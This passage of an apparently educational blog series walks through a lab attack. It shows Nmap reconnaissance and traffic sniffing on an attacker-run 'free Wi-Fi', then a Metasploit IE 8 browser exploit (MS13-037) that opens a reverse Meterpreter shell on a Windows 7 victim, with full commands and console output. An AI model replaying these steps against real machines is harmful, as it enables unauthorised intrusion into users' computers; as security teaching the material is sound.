   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   2   IE 8 on Windows 7 SP1 with ntdll.dll Info Leak

msf exploit(ms13_037_svg_dashstyle) > 

We’ll just configure LHOST which is the listening IP address for the payload.  Since we want the Meterpreter session to be sent back to our Attacker machine, we’ll set LHOST to 10.0.1.10 by typing set LHOST 10.0.1.10.  Again, we’ll type show options to review our changes one last time before executing the exploit.

msf exploit(ms13_037_svg_dashstyle) > set LHOST 10.0.1.10
LHOST => 10.0.1.10
msf exploit(ms13_037_svg_dashstyle) > show options

Module options (exploit/windows/browser/ms13_037_svg_dashstyle):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     clickme          no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     10.0.1.10        yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   2   IE 8 on Windows 7 SP1 with ntdll.dll Info Leak

msf exploit(ms13_037_svg_dashstyle) > 

Looks like everything’s configured just the way we wanted.  Let’s create the malicious website and serve the payload by typing exploit.

msf exploit(ms13_037_svg_dashstyle) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.10:4444 
[*] Using URL: http://0.0.0.0:80/clickme
[*]  Local IP: http://10.0.1.10:80/clickme
[*] Server started.
msf exploit(ms13_037_svg_dashstyle) > 

Now on our Victim machine, we’ll visit the URL created, http://10.0.1.10/clickme, and see what happens.

victim_exploit

From the screenshot above, we can see that Victim was redirected to another URL and the screen appears blank as if it’s trying to load something.  Eventually, Internet Explorer crashes.

ie_crash

So what happened?  Did our exploit fail?  Let’s check our Metasploit console.

msf exploit(ms13_037_svg_dashstyle) > 
[*] 10.0.1.11        ms13_037_svg_dashstyle - Requesting: /clickme
[*] 10.0.1.11        ms13_037_svg_dashstyle - Sending HTML to info leak...
[*] 10.0.1.11        ms13_037_svg_dashstyle - Requesting: /clickme/XssWuvigzg?RvtqQ=1996386480
[*] 10.0.1.11        ms13_037_svg_dashstyle - Using ntdll ROP
[*] 10.0.1.11        ms13_037_svg_dashstyle - Sending HTML to trigger...
[*] Sending stage (770048 bytes) to 10.0.1.11
[*] Meterpreter session 1 opened (10.0.1.10:4444 -> 10.0.1.11:49328) at 2014-11-11 20:22:21 -0600
[*] Session ID 1 (10.0.1.10:4444 -> 10.0.1.11:49328) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3852)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1828
[+] Successfully migrated to process 

This looks promising!  The Metasploit output above is a log of what actions occurred when Victim browsed to our malicious website.  Immediately after the Meterpreter session was created, it opened a Notepad process in the background (the user can’t see it) and then migrated itself to this Notepad process.  The reason being that once Internet Explorer crashes and is closed, the Meterpreter session dies.  Often times, an exploit will cause the target application to crash or close unexpectedly.  If the Meterpreter session is running as that process, it will then die along with it.

A quick look at the Windows Task Manager confirms that Notepad is running in the background with the PID of 1828 as noted in the Metasploit output.  We can also see the process is running as user eric.

taskmgr

Back in Metasploit, let’s view our open Meterpreter sessions by typing sessions.

msf exploit(ms13_037_svg_dashstyle) > sessions

Active sessions
===============

  Id  Type                   Information                             Connection
  --  ----                   -----------                             ----------
  1   meterpreter x86/win32  WIN-FDN9DNVQ5IR\eric @ WIN-FDN9DNVQ5IR  10.0.1.10:4444 -> 10.0.1.11:49328 (10.0.1.11)

Now let’s interact with the session by typing sessions -i 1.

msf exploit(ms13_037_svg_dashstyle) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > 

As proof that we are in fact remotely connected to Victim, we can type shell to open a Windows command prompt (cmd.exe) and then type ipconfig to verify the IP address of Victim. We can see the IP address is 10.0.1.11. We can also type hostname to confirm that this is the same hostname we saw in our reconnaissance phase.

meterpreter > shell
Process 2936 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\eric\Desktop>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::a0dd:5cb7:b23d:af11%11
   IPv4 Address. . . . . . . . . . . : 10.0.1.11
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.1.1

Tunnel adapter isatap.austin.rr.com:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Tunnel adapter Local Area Connection* 13:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : 2001:0:5ef5:79fd:3cfe:11c4:f5ff:fef4
   Link-local IPv6 Address . . . . . : fe80::3cfe:11c4:f5ff:fef4%13
   Default Gateway . . . . . . . . . : ::

Tunnel adapter isatap.{6657C62C-5DA5-4E0B-9C4A-2786A3F83F20}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Users\eric\Desktop>hostname
hostname
WIN-FDN9DNVQ5IR

So what have we accomplished so far?  We set up a client-side exploit by using Metasploit to craft a malicious website that exploited a vulnerability in an old version of Internet Explorer 8.  The exploit then loaded a malicious payload that opened a Meterpreter session for us that we used to remotely access Victim.  Pretty cool, huh?

Hopefully, this will make you think twice about joining “free Wi-Fi” or clicking on suspicious links.  This should also encourage you to keep your software up to date, especially your internet browser.

What’s Next

So far, we’ve seen how easy it is to exploit vulnerabilities and affirmed the importance of maintaining updated software.  In the final part of this series, we’ll further explore Meterpreter and its capabilities including privilege escalation, data exfiltration, and maintaining persistence.

Facebooktwittergoogle_plusredditpinterestlinkedintumblrmailFacebooktwittergoogle_plusredditpinterestlinkedintumblrmail

Seeing Red: Reconnaissance

Reconnaissance: Know Your Target

This is part of a series of posts that walk through an attack.  To start from the beginning, click here.

In the last post, we got a brief overview of Kali Linux and some of its capabilities.  In this part, we’ll start to use some of Kali’s tools to perform reconnaissance on our intended target.

In our scenario, we’ll assume we’ve set up a “free wireless network” that we have full control over.  On this network, there are two machines: our Kali instance (“Attacker”) and a machine that has decided to join our wireless network (“Victim”).

Computer Operating System IP Address
Attacker Kali x64 10.0.1.10
Victim Unknown 10.0.1.11

At this point, we don’t know much about Victim, other than its IP address.  This is where reconnaissance comes in.  The more time we spend performing reconnaissance to gather intelligence and better understand our target, the better our chances of a successful attack.  One of the most popular ways to gather information is the art of port scanning.

Port Scanning: Nmap

When security professionals talk about port scanning, they’re really talking about Nmap.  From Nmap’s website:

Nmap (“Network Mapper”) is a free and open source utility for network discovery and security auditing.

Sounds like just the tool for the job.  Kali, of course, conveniently comes preconfigured with Nmap, ready for use.  Be warned, Nmap is typically not very stealthy and any good security analyst with a decent monitoring system should be able to detect it with relative ease.  That said, most home or public wireless networks are not monitored, and the average user likely is unaware of Nmap, so it can be used without raising too much concern.

Now, using Attacker, we’ll perform a basic port scan on Victim to determine what operating system is running and what services/applications may be vulnerable to an attack.  To do this, we’ll execute Nmap on Kali with the following command:

nmap -sS -A 10.0.1.11

After about a minute, we find some interesting results:

root@kali:~# nmap -sS -A 10.0.1.11

Starting Nmap 6.47 ( http://nmap.org ) at 2014-11-02 21:49 CST
Nmap scan report for 10.0.1.11
Host is up (0.0019s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE     VERSION
135/tcp   open  msrpc       Microsoft Windows RPC
139/tcp   open  netbios-ssn
445/tcp   open  netbios-ssn
49152/tcp open  msrpc       Microsoft Windows RPC
49153/tcp open  msrpc       Microsoft Windows RPC
49154/tcp open  msrpc       Microsoft Windows RPC
49155/tcp open  msrpc       Microsoft Windows RPC
49156/tcp open  msrpc       Microsoft Windows RPC
49157/tcp open  msrpc       Microsoft Windows RPC
MAC Address: 00:0C:29:75:44:FE (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_8
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, or Windows 8
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN-FDN9DNVQ5IR, NetBIOS user: , NetBIOS MAC: 00:0c:29:75:44:fe (VMware)
| smb-os-discovery: 
|   OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: WIN-FDN9DNVQ5IR
|   NetBIOS computer name: WIN-FDN9DNVQ5IR
|   Workgroup: WORKGROUP
|_  System time: 2014-11-02T21:50:47-06:00
| smb-security-mode: 
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   1.94 ms 10.0.1.11

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.58 seconds

From this simple network scan, we’ve learned that Victim is running Windows 7 Ultimate SP1 with the typical file and printing services running.  Interestingly, we can even see the computer name, the workgroup, and current system time.  Ultimately, this tells us to focus on Windows 7-specific exploits.

We can take it even further and sniff the network (we control it after all!) and see what else we can learn about Victim.  Running a tool like tcpdump, we observe Victim browsing the web and note the user agent string:

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Now we know Victim is running Windows 7 SP1 and using an old version of Internet Explorer.  It’s highly likely that Victim hasn’t been patched lately and is susceptible to a number of Windows-based exploits.

What’s Next

So far, we’ve familiarized ourselves with Kali Linux and performed basic reconnaissance.  In the next part, we’ll use the intelligence we gathered to execute a client-side exploit on our target machine.

Facebooktwittergoogle_plusredditpinterestlinkedintumblrmailFacebooktwittergoogle_plusredditpinterestlinkedintumblrmail